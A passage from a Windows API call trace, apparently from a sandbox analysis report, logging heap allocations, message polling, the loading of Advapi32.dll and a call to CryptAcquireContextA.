hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.309] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0152.309] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0152.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0152.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0152.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0152.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0152.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.310] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0152.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0152.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0152.311] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0152.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0152.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0152.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.312] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.312] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0152.313] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.313] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0152.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0152.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0152.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0152.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0152.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.315] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0152.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0152.416] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0152.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0152.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0152.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699e8 [0152.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0152.417] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0152.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0152.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0152.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0152.418] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0152.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 